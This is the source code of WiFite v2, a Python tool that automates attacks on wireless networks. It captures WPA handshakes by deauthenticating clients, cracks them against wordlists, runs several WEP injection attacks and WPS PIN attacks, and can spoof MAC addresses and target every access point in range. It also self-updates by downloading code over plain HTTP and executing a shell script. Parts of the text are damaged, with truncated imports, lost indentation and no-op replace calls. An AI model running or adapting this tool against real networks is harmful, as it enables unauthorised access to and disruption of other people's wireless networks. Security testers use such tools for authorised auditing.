import urllib # Check for new versions from the repo
################################
# GLOBAL VARIABLES IN ALL CAPS #
################################
REVISION = 85;
# WPA variables
WPA_DISABLE = False # Flag to skip WPA handshake capture
WPA_STRIP_HANDSHAKE = True # Use pyrit or tshark (if applicable) to strip handshake
WPA_DEAUTH_TIMEOUT = 10 # Time to wait between deauthentication bursts (in seconds)
WPA_ATTACK_TIMEOUT = 500 # Total time to allow for a handshake attack (in seconds)
WPA_HANDSHAKE_DIR = 'hs' # Directory in which handshakes .cap files are stored
# Strip file path separator if needed
if WPA_HANDSHAKE_DIR != '' and WPA_HANDSHAKE_DIR[-1] == os.sep:
WPA_HANDSHAKE_DIR = WPA_HANDSHAKE_DIR[:-1]
WPA_FINDINGS = [] # List of strings containing info on successful WPA attacks
WPA_DONT_CRACK = False # Flag to skip cracking of handshakes
WPA_DICTIONARY = '/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'
if not os.path.exists(WPA_DICTIONARY): WPA_DICTIONARY = ''
# Various programs to use when checking for a four-way handshake.
# True means the program must find a valid handshake in order for wifite to recognize a handshake.
# Not finding handshake short circuits result (ALL 'True' programs must find handshake)
WPA_HANDSHAKE_TSHARK = True # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th)
WPA_HANDSHAKE_PYRIT = False # Sometimes crashes on incomplete dumps, but accurate.
WPA_HANDSHAKE_AIRCRACK = True # Not 100% accurate, but fast.
WPA_HANDSHAKE_COWPATTY = False # Uses more lenient "nonstrict mode" (-2)
# WEP variables
WEP_DISABLE = False # Flag for ignoring WEP networks
WEP_PPS = 600 # packets per second (Tx rate)
WEP_TIMEOUT = 600 # Amount of time to give each attack
WEP_ARP_REPLAY = True # Various WEP-based attacks via aireplay-ng
WEP_CHOPCHOP = True #
WEP_FRAGMENT = True #
WEP_CAFFELATTE = True #
WEP_P0841 = True
WEP_HIRTE = True
WEP_CRACK_AT_IVS = 10000 # Number of IVS at which we start cracking
WEP_IGNORE_FAKEAUTH = True # When True, continues attack despite fake authentication failure
WEP_FINDINGS = [] # List of strings containing info on successful WEP attacks.
WEP_SAVE = False # Save packets.
# WPS variables
WPS_DISABLE = False # Flag to skip WPS scan and attacks
WPS_FINDINGS = [] # List of (successful) results of WPS attacks
WPS_TIMEOUT = 660 # Time to wait (in seconds) for successful PIN attempt
WPS_RATIO_THRESHOLD = 0.01 # Lowest percentage of tries/attempts allowed (where tries > 0)
WPS_MAX_RETRIES = 0 # Number of times to re-try the same pin before giving up completely.
# Program variables
WIRELESS_IFACE = '' # User-defined interface
TARGET_CHANNEL = 0 # User-defined channel to scan on
TARGET_ESSID = '' # User-defined ESSID of specific target to attack
TARGET_BSSID = '' # User-defined BSSID of specific target to attack
IFACE_TO_TAKE_DOWN = '' # Interface that wifite puts into monitor mode
# It's our job to put it out of monitor mode after the attacks
ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing)
DO_NOT_CHANGE_MAC = True # Flag for disabling MAC anonymizer
TARGETS_REMAINING = 0 # Number of access points remaining to attack
WPA_CAPS_TO_CRACK = [] # list of .cap files to crack (full of CapFile objects)
THIS_MAC = '' # The interfaces current MAC address.
SHOW_MAC_IN_SCAN = False # Display MACs of the SSIDs in the list of targets
CRACKED_TARGETS = [] # List of targets we have already cracked
ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone*
ATTACK_MIN_POWER = 0 # Minimum power (dB) for access point to be considered a target
VERBOSE_APS = True # Print access points as they appear
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
if os.getuid() != 0:
print R+' [!]'+O+' ERROR:'+G+' wifite'+O+' must be run as '+R+'root'+W
print R+' [!]'+O+' login as root ('+W+'su root'+O+') or try '+W+'sudo ./wifite.py'+W
exit(1)
if not os.uname()[0].startswith("Linux") and not 'Darwin' in os.uname()[0]: # OSX support, 'cause why not?
print O+' [!]'+R+' WARNING:'+G+' wifite'+W+' must be run on '+O+'linux'+W
exit(1)
# Create temporary directory to work in
from tempfile import mkdtemp
temp = mkdtemp(prefix='wifite')
if not temp.endswith(os.sep):
temp += os.sep
# /dev/null, send output from programs so they don't print to screen.
DN = open(os.devnull, 'w')
###################
# DATA STRUCTURES #
###################
class CapFile:
    """
    Metadata for a captured .cap file: its path plus the target access
    point's ESSID and BSSID.
    """
    def __init__(self, filename, ssid, bssid):
        self.filename, self.ssid, self.bssid = filename, ssid, bssid
class Target:
    """
    A wireless access point (router) discovered during scanning, along
    with the attack state wifite tracks for it.
    """
    def __init__(self, bssid, power, data, channel, encryption, ssid):
        (self.bssid, self.power, self.data,
         self.channel, self.encryption, self.ssid) = (
            bssid, power, data, channel, encryption, ssid)
        self.wps = False  # assume WPS is not enabled until detected
        self.key = ''     # cracked key, filled in after a successful attack
class Client:
    """
    A device observed talking to an access point: its own MAC, the AP it
    is associated with, and its signal power.
    """
    def __init__(self, bssid, station, power):
        self.bssid, self.station, self.power = bssid, station, power
##################
# MAIN FUNCTIONS #
##################
def main():
    """
    Where the magic happens: scan for targets, filter already-cracked
    APs and existing handshakes, attack each remaining AP (WPS/WPA/WEP),
    then summarize and optionally crack captured handshakes.
    """
    global TARGETS_REMAINING, THIS_MAC, CRACKED_TARGETS
    CRACKED_TARGETS = load_cracked() # Load previously-cracked APs from file
    handle_args() # Parse args from command line, set global variables.
    initial_check() # Ensure required programs are installed.
    # The "get_iface" method anonymizes the MAC address (if needed)
    # and puts the interface into monitor mode.
    iface = get_iface()
    THIS_MAC = get_mac_address(iface) # Store current MAC address
    (targets, clients) = scan(iface=iface, channel=TARGET_CHANNEL)
    try:
        index = 0
        while index < len(targets):
            target = targets[index]
            # Check if we have already cracked this target
            for already in CRACKED_TARGETS:
                if already.bssid == targets[index].bssid:
                    print R+'\n [!]'+O+' you have already cracked this access point\'s key!'+W
                    print R+' [!] %s' % (C+already.ssid+W+': "'+G+already.key+W+'"')
                    ri = raw_input(GR+' [+] '+W+'do you want to crack this access point again? ('+G+'y/'+O+'n'+W+'): ')
                    if ri.lower() == 'n':
                        targets.pop(index)
                        index -= 1
                    break
            # Check if handshakes already exist, ask user whether to skip targets or save new handshakes
            handshake_file = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
                             + '_' + target.bssid.replace(':', '-') + '.cap'
            if os.path.exists(handshake_file):
                print R+'\n [!] '+O+'you already have a handshake file for %s:' % (C+target.ssid+W)
                print '        %s\n' % (G+handshake_file+W)
                print GR+' [+]'+W+' do you want to '+G+'[s]kip'+W+', '+O+'[c]apture again'+W+', or '+R+'[o]verwrite'+W+'?'
                ri = 'x'
                while ri != 's' and ri != 'c' and ri != 'o':
                    ri = raw_input(GR+' [+] '+W+'enter '+G+'s'+W+', '+O+'c,'+W+' or '+R+'o'+W+': '+G).lower()
                print W+"\b",
                if ri == 's':
                    targets.pop(index)
                    index -= 1
                elif ri == 'o':
                    remove_file(handshake_file)
                    continue
            index += 1
    except KeyboardInterrupt:
        print '\n '+R+'(^C)'+O+' interrupted\n'
        exit_gracefully(0)
    # Per-encryption attack counters for the end-of-run summary.
    wpa_success = 0
    wep_success = 0
    wpa_total = 0
    wep_total = 0
    TARGETS_REMAINING = len(targets)
    for t in targets:
        TARGETS_REMAINING -= 1
        # Build list of clients connected to target
        ts_clients = []
        for c in clients:
            if c.station == t.bssid:
                ts_clients.append(c)
        print ''
        if t.encryption.find('WPA') != -1:
            need_handshake = True
            # Try the WPS attack first; a WPS success makes the handshake
            # capture unnecessary.
            if not WPS_DISABLE and t.wps:
                need_handshake = not wps_attack(iface, t)
                wpa_total += 1
                if not need_handshake: wpa_success += 1
            if TARGETS_REMAINING < 0: break
            if not WPA_DISABLE and need_handshake:
                wpa_total += 1
                if wpa_get_handshake(iface, t, ts_clients):
                    wpa_success += 1
        elif t.encryption.find('WEP') != -1:
            wep_total += 1
            if attack_wep(iface, t, ts_clients):
                wep_success += 1
        else: print R+' unknown encryption:',t.encryption,W
        # If user wants to stop attacking
        if TARGETS_REMAINING <= 0: break
    if wpa_total + wep_total > 0:
        # Attacks are done! Show results to user
        print ''
        print GR+' [+] %s%d attack%s completed:%s' % (G, wpa_total + wep_total, '' if wpa_total+wep_total == 1 else 's', W)
        print ''
        if wpa_total > 0:
            if wpa_success == 0: print GR+' [+]'+R,
            elif wpa_success == wpa_total: print GR+' [+]'+G,
            else: print GR+' [+]'+O,
            print '%d/%d%s WPA attacks succeeded' % (wpa_success, wpa_total, W)
            for finding in WPA_FINDINGS:
                print '        ' + C+finding+W
        if wep_total > 0:
            if wep_success == 0: print GR+' [+]'+R,
            elif wep_success == wep_total: print GR+' [+]'+G,
            else: print GR+' [+]'+O,
            print '%d/%d%s WEP attacks succeeded' % (wep_success, wep_total, W)
            for finding in WEP_FINDINGS:
                print '        ' + C+finding+W
        caps = len(WPA_CAPS_TO_CRACK)
        if caps > 0 and not WPA_DONT_CRACK:
            print GR+' [+]'+W+' starting '+G+'WPA cracker'+W+' on %s%d handshake%s' % (G, caps, W if caps == 1 else 's'+W)
            for cap in WPA_CAPS_TO_CRACK:
                wpa_crack(cap)
    print ''
    exit_gracefully(0)
def rename(old, new):
    """
    Renames file 'old' to 'new', works with separate partitions.
    Thanks to hannan.sadar
    """
    try:
        os.rename(old, new)
    except os.error, detail:
        if detail.errno == errno.EXDEV:
            # Cross-device rename: fall back to copy + delete.
            try:
                copy(old, new)
            except:
                # Copy failed: don't leave a partial destination behind.
                os.unlink(new)
                raise
            os.unlink(old)
        # if desired, deal with other errors
        else:
            raise
def initial_check():
    """
    Ensures required programs are installed.

    Exits on missing aircrack-ng tools or iw; merely warns (and disables
    WPS attacks) when reaver/walsh or the recommended handshake checkers
    are absent.
    """
    global WPS_DISABLE
    airs = ['aircrack-ng', 'airodump-ng', 'aireplay-ng', 'airmon-ng', 'packetforge-ng']
    for air in airs:
        if program_exists(air): continue
        print R+' [!]'+O+' required program not found: %s' % (R+air+W)
        print R+' [!]'+O+' this program is bundled with the aircrack-ng suite:'+W
        print R+' [!]'+O+'        '+C+'http://www.aircrack-ng.org/'+W
        print R+' [!]'+O+' or: '+W+'sudo apt-get install aircrack-ng\n'+W
        exit_gracefully(1)
    if not program_exists('iw'):
        print R+' [!]'+O+' airmon-ng requires the program %s\n' % (R+'iw'+W)
        exit_gracefully(1)
    printed = False
    # Check reaver
    if not program_exists('reaver'):
        printed = True
        print R+' [!]'+O+' the program '+R+'reaver'+O+' is required for WPS attacks'+W
        print R+'    '+O+' available at '+C+'http://code.google.com/p/reaver-wps'+W
        WPS_DISABLE = True
    elif not program_exists('walsh') and not program_exists('wash'):
        printed = True
        print R+' [!]'+O+' reaver\'s scanning tool '+R+'walsh'+O+' (or '+R+'wash'+O+') was not found'+W
        print R+' [!]'+O+' please re-install reaver or install walsh/wash separately'+W
    # Check handshake-checking apps
    recs = ['tshark', 'pyrit', 'cowpatty']
    for rec in recs:
        if program_exists(rec): continue
        printed = True
        print R+' [!]'+O+' the program %s is not required, but is recommended%s' % (R+rec+O, W)
    if printed: print ''
def handle_args():
"""
Handles command-line arguments, sets global variables.
"""
global WIRELESS_IFACE, TARGET_CHANNEL, DO_NOT_CHANGE_MAC, TARGET_ESSID, TARGET_BSSID
global WPA_DISABLE, WPA_STRIP_HANDSHAKE, WPA_DEAUTH_TIMEOUT, WPA_ATTACK_TIMEOUT
global WPA_DONT_CRACK, WPA_DICTIONARY, WPA_HANDSHAKE_TSHARK, WPA_HANDSHAKE_PYRIT
global WPA_HANDSHAKE_AIRCRACK, WPA_HANDSHAKE_COWPATTY
global WEP_DISABLE, WEP_PPS, WEP_TIMEOUT, WEP_ARP_REPLAY, WEP_CHOPCHOP, WEP_FRAGMENT
global WEP_CAFFELATTE, WEP_P0841, WEP_HIRTE, WEP_CRACK_AT_IVS, WEP_IGNORE_FAKEAUTH
global WEP_SAVE, SHOW_MAC_IN_SCAN, ATTACK_ALL_TARGETS, ATTACK_MIN_POWER
global WPS_DISABLE, WPS_TIMEOUT, WPS_RATIO_THRESHOLD, WPS_MAX_RETRIES
global VERBOSE_APS
args = argv[1:]
if args.count('-h') + args.count('--help') + args.count('?') + args.count('-help') > 0:
help()
exit_gracefully(0)
set_encrypt = False
set_hscheck = False
set_wep = False
capfile = '' # Filename of .cap file to analyze for handshakes
try:
for i in xrange(0, len(args)):
if not set_encrypt and (args[i] == '-wpa' or args[i] == '-wep' or args[i] == '-wps'):
WPS_DISABLE = True
WPA_DISABLE = True
WEP_DISABLE = True
set_encrypt = True
if args[i] == '-wpa':
print GR+' [+]'+W+' targeting '+G+'WPA'+W+' encrypted networks (use '+G+'-wps'+W+' for WPS scan)'
WPA_DISABLE = False
elif args[i] == '-wep':
print GR+' [+]'+W+' targeting '+G+'WEP'+W+' encrypted networks'
WEP_DISABLE = False
elif args[i] == '-wps':
print GR+' [+]'+W+' targeting '+G+'WPS-enabled'+W+' networks'
WPS_DISABLE = False
elif args[i] == '-c':
i += 1
try: TARGET_CHANNEL = int(args[i])
except ValueError: print O+' [!]'+R+' invalid channel: '+O+args[i]+W
except IndexError: print O+' [!]'+R+' no channel given!'+W
else: print GR+' [+]'+W+' channel set to %s' % (G+args[i]+W)
elif args[i] == '-mac':
print GR+' [+]'+W+' mac address anonymizing '+G+'enabled'+W
print O+' note: only works if device is not already in monitor mode!'+W
DO_NOT_CHANGE_MAC = False
elif args[i] == '-i':
i += 1
WIRELESS_IFACE = args[i]
print GR+' [+]'+W+' set interface: %s' % (G+args[i]+W)
elif args[i] == '-e':
i += 1
try: TARGET_ESSID = args[i]
except ValueError: print R+' [!]'+O+' no ESSID given!'+W
else: print GR+' [+]'+W+' targeting ESSID "%s"' % (G+args[i]+W)
elif args[i] == '-b':
i += 1
try: TARGET_BSSID = args[i]
except ValueError: print R+' [!]'+O+' no BSSID given!'+W
else: print GR+' [+]'+W+' targeting BSSID "%s"' % (G+args[i]+W)
elif args[i] == '-showb' or args[i] == '-showbssid':
SHOW_MAC_IN_SCAN = True
print GR+' [+]'+W+' target MAC address viewing '+G+'enabled'+W
elif args[i] == '-all' or args[i] == '-hax0ritna0':
print GR+' [+]'+W+' targeting '+G+'all access points'+W
ATTACK_ALL_TARGETS = True
elif args[i] == '-pow' or args[i] == '-power':
i += 1
try:
ATTACK_MIN_POWER = int(args[i])
except ValueError: print R+' [!]'+O+' invalid power level: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no power level given!'+W
else: print GR+' [+]'+W+' minimum target power set to %s' % (G+args[i] + "dB"+W)
elif args[i] == '-q' or args[i] == '-quiet':
VERBOSE_APS = False
print GR+' [+]'+W+' list of APs during scan '+O+'disabled'+W
elif args[i] == '-check':
i += 1
try: capfile = args[i]
except IndexError:
print R+' [!]'+O+' unable to analyze capture file'+W
print R+' [!]'+O+' no cap file given!\n'+W
exit_gracefully(1)
else:
if not os.path.exists(capfile):
print R+' [!]'+O+' unable to analyze capture file!'+W
print R+' [!]'+O+' file not found: '+R+capfile+'\n'+W
exit_gracefully(1)
elif args[i] == '-upgrade' or args[i] == '-update':
upgrade()
exit(0)
elif args[i] == '-cracked':
if len(CRACKED_TARGETS) == 0:
print R+' [!]'+O+' there are not cracked access points saved to '+R+'cracked.txt\n'+W
exit_gracefully(1)
print GR+' [+]'+W+' '+W+'previously cracked access points'+W+':'
for victim in CRACKED_TARGETS:
print ' %s (%s) : "%s"' % (C+victim.ssid+W, C+victim.bssid+W, G+victim.key+W)
print ''
exit_gracefully(0)
# WPA
if not set_hscheck and (args[i] == '-tshark' or args[i] == '-cowpatty' or args[i] == '-aircrack' or args[i] == 'pyrit'):
WPA_HANDSHAKE_TSHARK = False
WPA_HANDSHAKE_PYRIT = False
WPA_HANDSHAKE_COWPATTY = False
WPA_HANDSHAKE_AIRCRACK = False
set_hscheck = True
elif args[i] == '-strip':
WPA_STRIP_HANDSHAKE = True
print GR+' [+]'+W+' handshake stripping '+G+'enabled'+W
elif args[i] == '-wpadt':
i += 1
WPA_DEAUTH_TIMEOUT = int(args[i])
print GR+' [+]'+W+' WPA deauth timeout set to %s' % (G+args[i]+' seconds'+W)
elif args[i] == '-wpat':
i += 1
WPA_ATTACK_TIMEOUT = int(args[i])
print GR+' [+]'+W+' WPA attack timeout set to %s' % (G+args[i]+' seconds'+W)
elif args[i] == '-crack':
WPA_DONT_CRACK = False
print GR+' [+]'+W+' WPA cracking '+G+'enabled'+W
elif args[i] == '-dict':
i += 1
try:
WPA_DICTIONARY = args[i]
except IndexError: print R+' [!]'+O+' no WPA dictionary given!'
else:
if os.path.exists(args[i]):
print GR+' [+]'+W+' WPA dictionary set to %s' % (G+args[i]+W)
else:
print R+' [!]'+O+' WPA dictionary file not found: %s' % (args[i])
if args[i] == '-tshark':
WPA_HANDSHAKE_TSHARK = True
print GR+' [+]'+W+' tshark handshake verification '+G+'enabled'+W
if args[i] == '-pyrit':
WPA_HANDSHAKE_PYRIT = True
print GR+' [+]'+W+' pyrit handshake verification '+G+'enabled'+W
if args[i] == '-aircrack':
WPA_HANDSHAKE_AIRCRACK = True
print GR+' [+]'+W+' aircrack handshake verification '+G+'enabled'+W
if args[i] == '-cowpatty':
WPA_HANDSHAKE_COWPATTY = True
print GR+' [+]'+W+' cowpatty handshake verification '+G+'enabled'+W
# WEP
if not set_wep and args[i] == '-chopchop' or args[i] == 'fragment' or \
args[i] == 'caffelatte' or args[i] == '-arpreplay' or \
args[i] == '-p0841' or args[i] == '-hirte':
WEP_CHOPCHOP = False
WEP_ARPREPLAY = False
WEP_CAFFELATTE = False
WEP_FRAGMENT = False
WEP_P0841 = False
WEP_HIRTE = False
if args[i] == '-chopchop':
print GR+' [+]'+W+' WEP chop-chop attack '+G+'enabled'+W
WEP_CHOPCHOP = True
if args[i] == '-fragment' or args[i] == '-frag' or args[i] == '-fragmentation':
print GR+' [+]'+W+' WEP fragmentation attack '+G+'enabled'+W
WEP_FRAGMENT = True
if args[i] == '-caffelatte':
print GR+' [+]'+W+' WEP caffe-latte attack '+G+'enabled'+W
WEP_CAFFELATTE = True
if args[i] == '-arpreplay':
print GR+' [+]'+W+' WEP arp-replay attack '+G+'enabled'+W
WEP_ARPREPLAY = True
if args[i] == '-p0841':
print GR+' [+]'+W+' WEP p0841 attack '+G+'enabled'+W
WEP_P0841 = True
if args[i] == '-hirte':
print GR+' [+]'+W+' WEP hirte attack '+G+'enabled'+W
WEP_HIRTE = True
if args[i] == '-nofake':
print GR+' [+]'+W+' ignoring failed fake-authentication '+R+'disabled'+W
WEP_IGNORE_FAKEAUTH = False
if args[i] == '-wept' or args[i] == '-weptime':
i += 1
try:
WEP_TIMEOUT = int(args[i])
except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no timeout given!'+W
else: print GR+' [+]'+W+' WEP attack timeout set to %s' % (G+args[i] + " seconds"+W)
if args[i] == '-pps':
i += 1
try:
WEP_PPS = int(args[i])
except ValueError: print R+' [!]'+O+' invalid value: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no value given!'+W
else: print GR+' [+]'+W+' packets-per-second rate set to %s' % (G+args[i] + " packets/sec"+W)
if args[i] == '-save' or args[i] == '-wepsave':
WEP_SAVE = True
print GR+' [+]'+W+' WEP .cap file saving '+G+'enabled'+W
# WPS
if args[i] == '-wpst' or args[i] == '-wpstime':
i += 1
try:
WPS_TIMEOUT = int(args[i])
except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no timeout given!'+W
else: print GR+' [+]'+W+' WPS attack timeout set to %s' % (G+args[i] + " seconds"+W)
if args[i] == '-wpsratio' or args[i] == 'wpsr':
i += 1
try:
WPS_RATIO_THRESHOLD = float(args[i])
except ValueError: print R+' [!]'+O+' invalid percentage: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no ratio given!'+W
else: print GR+' [+]'+W+' minimum WPS tries/attempts threshold set to %s' % (G+args[i] + ""+W)
if args[i] == '-wpsmaxr' or args[i] == '-wpsretry':
i += 1
try:
WPS_MAX_RETRIES = int(args[i])
except ValueError: print R+' [!]'+O+' invalid number: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no number given!'+W
else: print GR+' [+]'+W+' WPS maximum retries set to %s' % (G+args[i] + " retries"+W)
except IndexError:
print '\nindexerror\n\n'
if capfile != '':
analyze_capfile(capfile)
print ''
def banner():
"""
Displays ASCII art of the highest caliber.
"""
global REVISION
print ''
print G+" .;' `;, "
print G+" .;' ,;' `;, `;, "+W+"WiFite v2 (r" + str(REVISION) + ")"
print G+".;' ,;' ,;' `;, `;, `;, "
print G+":: :: : "+GR+"( )"+G+" : :: :: "+GR+"automated wireless auditor"
print G+"':. ':. ':. "+GR+"/_\\"+G+" ,:' ,:' ,:' "
print G+" ':. ':. "+GR+"/___\\"+G+" ,:' ,:' "+GR+"designed for Linux"
print G+" ':. "+GR+"/_____\\"+G+" ,:' "
print G+" "+GR+"/ \\"+G+" "
print W
def upgrade():
    """
    Checks for new version, prompts to upgrade, then
    replaces this script with the latest from the repo
    """
    global REVISION
    try:
        print GR+' [!]'+W+' upgrading requires an '+G+'internet connection'+W
        print GR+' [+]'+W+' checking for latest version...'
        # Ask the googlecode repository for the newest revision metadata.
        (revision, description, date_changed) = get_revision()
        if revision == -1:
            # get_revision() returns -1 when the site is unreachable.
            print R+' [!]'+O+' unable to access googlecode'+W
        elif revision > REVISION:
            print GR+' [!]'+W+' a new version is '+G+'available!'+W
            print GR+' [-]'+W+' revision: '+G+str(revision)+W
            print GR+' [-]'+W+' description: '+G+description+W
            print GR+' [-]'+W+' date added: '+G+date_changed+W
            # Confirm before overwriting the running script.
            response = raw_input(GR+' [+]'+W+' do you want to upgrade to the latest version? (y/n): ')
            if not response.lower().startswith('y'):
                print GR+' [-]'+W+' upgrading '+O+'aborted'+W
                exit_gracefully(0)
                return
            # Download script, replace with this one
            print GR+' [+] '+G+'downloading'+W+' update...'
            try:
                sock = urllib.urlopen('http://wifite.googlecode.com/svn/trunk/wifite.py')
                page = sock.read()
            except IOError:
                # Download failed; the empty page is handled just below.
                page = ''
            if page == '':
                print R+' [+] '+O+'unable to download latest version'+W
                exit_gracefully(1)
            # Create/save the new script
            f=open('wifite_new.py','w')
            f.write(page)
            f.close()
            # The filename of the running script
            this_file = __file__
            if this_file.startswith('./'):
                this_file = this_file[2:]
            # create/save a shell script that replaces this script with the new one
            # (a separate shell script is used so the running file can be swapped out)
            f = open('update_wifite.sh','w')
            f.write('''#!/bin/sh\n
rm -rf ''' + this_file + '''\n
mv wifite_new.py ''' + this_file + '''\n
rm -rf update_wifite.sh\n
chmod +x ''' + this_file + '''\n
''')
            f.close()
            # Change permissions on the script
            returncode = call(['chmod','+x','update_wifite.sh'])
            if returncode != 0:
                print R+' [!]'+O+' permission change returned unexpected code: '+str(returncode)+W
                exit_gracefully(1)
            # Run the script
            returncode = call(['sh','update_wifite.sh'])
            if returncode != 0:
                print R+' [!]'+O+' upgrade script returned unexpected code: '+str(returncode)+W
                exit_gracefully(1)
            print GR+' [+] '+G+'updated!'+W+' type "./' + this_file + '" to run again'
        else:
            print GR+' [-]'+W+' your copy of wifite is '+G+'up to date'+W
    except KeyboardInterrupt:
        print R+'\n (^C)'+O+' wifite upgrade interrupted'+W
    # Always exits: either the new copy was installed or nothing changed.
    exit_gracefully(0)
def get_revision():
    """
    Gets latest revision # from google code repository
    Returns tuple: revision#, description of change, date changed
    """
    # Defaults returned when any parsing step below fails to match.
    irev =-1
    desc =''
    since=''
    try:
        sock = urllib.urlopen('http://code.google.com/p/wifite/source/list?path=/trunk/wifite.py')
        page = sock.read()
    except IOError:
        # No network / site unreachable: caller treats -1 as failure.
        return (-1, '', '')
    # get the revision
    start= page.find('href="detail?r=')
    stop = page.find('&', start)
    if start != -1 and stop != -1:
        start += 15 # skip past 'href="detail?r='
        rev=page[start:stop]
        try:
            irev=int(rev)
        except ValueError:
            rev=rev.split('\n')[0]
            print R+'[+] invalid revision number: "'+rev+'"'
    # get the description
    start= page.find(' href="detail?r='+str(irev)+'', start + 3)
    start= page.find('">',start)
    stop = page.find('</a>', start)
    if start != -1 and stop != -1:
        start += 2 # skip past the '">' of the anchor tag
        desc=page[start:stop].strip()
        # NOTE(review): these replace() calls look like they were meant to
        # decode HTML entities (&#39; &lt; &gt;) but source and target are
        # identical literals here -- possibly mangled; confirm upstream.
        desc=desc.replace("'","'")
        desc=desc.replace("<","<")
        desc=desc.replace(">",">")
        if '\n' in desc:
            desc = desc.split('\n')[0]
    # get the time last modified
    start= page.find(' href="detail?r='+str(irev)+'', start + 3)
    start= page.find('">',start)
    stop = page.find('</a>', start)
    if start != -1 and stop != -1:
        start += 2
        since=page[start:stop]
    return (irev, desc, since)
def help():
"""
Prints help screen
"""
head = W
sw = G
var = GR
des = W
de = G
print head+' COMMANDS'+W
print sw+'\t-check '+var+'<file>\t'+des+'check capfile '+var+'<file>'+des+' for handshakes.'+W
print sw+'\t-cracked \t'+des+'display previously-cracked access points'+W
print ''
print head+' GLOBAL'+W
print sw+'\t-all \t'+des+'attack all targets. '+de+'[off]'+W
print sw+'\t-i '+var+'<iface> \t'+des+'wireless interface for capturing '+de+'[auto]'+W
print sw+'\t-mac \t'+des+'anonymize mac address '+de+'[off]'+W
print sw+'\t-c '+var+'<channel>\t'+des+'channel to scan for targets '+de+'[auto]'+W
print sw+'\t-e '+var+'<essid> \t'+des+'target a specific access point by ssid (name) '+de+'[ask]'+W
print sw+'\t-b '+var+'<bssid> \t'+des+'target a specific access point by bssid (mac) '+de+'[auto]'+W
print sw+'\t-showb \t'+des+'display target BSSIDs after scan '+de+'[off]'+W
print sw+'\t-pow '+var+'<db> \t'+des+'attacks any targets with signal strenghth > '+var+'db '+de+'[0]'+W
print sw+'\t-quiet \t'+des+'do not print list of APs during scan '+de+'[off]'+W
print ''
print head+'\n WPA'+W
print sw+'\t-wpa \t'+des+'only target WPA networks (works with -wps -wep) '+de+'[off]'+W
print sw+'\t-wpat '+var+'<sec> \t'+des+'time to wait for WPA attack to complete (seconds) '+de+'[500]'+W
print sw+'\t-wpadt '+var+'<sec> \t'+des+'time to wait between sending deauth packets (sec) '+de+'[10]'+W
print sw+'\t-strip \t'+des+'strip handshake using tshark or pyrit '+de+'[off]'+W
print sw+'\t-crack '+var+'<dic>\t'+des+'crack WPA handshakes using '+var+'<dic>'+des+' wordlist file '+de+'[off]'+W
print sw+'\t-dict '+var+'<file>\t'+des+'specify dictionary to use when cracking WPA '+de+'[phpbb.txt]'+W
print sw+'\t-aircrack \t'+des+'verify handshake using aircrack '+de+'[on]'+W
print sw+'\t-pyrit \t'+des+'verify handshake using pyrit '+de+'[off]'+W
print sw+'\t-tshark \t'+des+'verify handshake using tshark '+de+'[on]'+W
print sw+'\t-cowpatty \t'+des+'verify handshake using cowpatty '+de+'[off]'+W
print head+'\n WEP'+W
print sw+'\t-wep \t'+des+'only target WEP networks '+de+'[off]'+W
print sw+'\t-pps '+var+'<num> \t'+des+'set the number of packets per second to inject '+de+'[600]'+W
print sw+'\t-wept '+var+'<sec> \t'+des+'sec to wait for each attack, 0 implies endless '+de+'[600]'+W
print sw+'\t-chopchop \t'+des+'use chopchop attack '+de+'[on]'+W
print sw+'\t-arpreplay \t'+des+'use arpreplay attack '+de+'[on]'+W
print sw+'\t-fragment \t'+des+'use fragmentation attack '+de+'[on]'+W
print sw+'\t-caffelatte \t'+des+'use caffe-latte attack '+de+'[on]'+W
print sw+'\t-p0841 \t'+des+'use -p0841 attack '+de+'[on]'+W
print sw+'\t-hirte \t'+des+'use hirte (cfrag) attack '+de+'[on]'+W
print sw+'\t-nofakeauth \t'+des+'stop attack if fake authentication fails '+de+'[off]'+W
print sw+'\t-wepca '+GR+'<n> \t'+des+'start cracking when number of ivs surpass n '+de+'[10000]'+W
print sw+'\t-wepsave \t'+des+'save a copy of .cap files to this directory '+de+'[off]'+W
print head+'\n WPS'+W
print sw+'\t-wps \t'+des+'only target WPS networks '+de+'[off]'+W
print sw+'\t-wpst '+var+'<sec> \t'+des+'max wait for new retry before giving up (0: never) '+de+'[660]'+W
print sw+'\t-wpsratio '+var+'<per>\t'+des+'min ratio of successful PIN attempts/total tries '+de+'[0]'+W
print sw+'\t-wpsretry '+var+'<num>\t'+des+'max number of retries for same PIN before giving up '+de+'[0]'+W
print head+'\n EXAMPLE'+W
print sw+'\t./wifite.py '+W+'-wps -wep -c 6 -pps 600'+W
print ''
###########################
# WIRELESS CARD FUNCTIONS #
###########################
def enable_monitor_mode(iface):
"""
Uses airmon-ng to put a device into Monitor Mode.
Then uses the get_iface() method to retrieve the new interface's name.
Sets global variable IFACE_TO_TAKE_DOWN as well.
Returns the name of the interface in monitor mode.
"""
global IFACE_TO_TAKE_DOWN
print GR+' [+]'+W+' enabling monitor mode on %s...' % (G+iface+W),
stdout.flush()
call(['airmon-ng', 'start', iface], stdout=DN, stderr=DN)
print 'done'
IFACE_TO_TAKE_DOWN = get_iface()
return IFACE_TO_TAKE_DOWN
def disable_monitor_mode():
"""
The program may have enabled monitor mode on a wireless interface.
We want to disable this before we exit, so we will do that.
"""
if IFACE_TO_TAKE_DOWN == '': return
print GR+' [+]'+W+' disabling monitor mode on %s...' % (G+IFACE_TO_TAKE_DOWN+W),
stdout.flush()
call(['airmon-ng', 'stop', IFACE_TO_TAKE_DOWN], stdout=DN, stderr=DN)
print 'done'
# Module-level flag: get_iface() prints its "scanning for wireless
# devices" notice only the first time it runs.
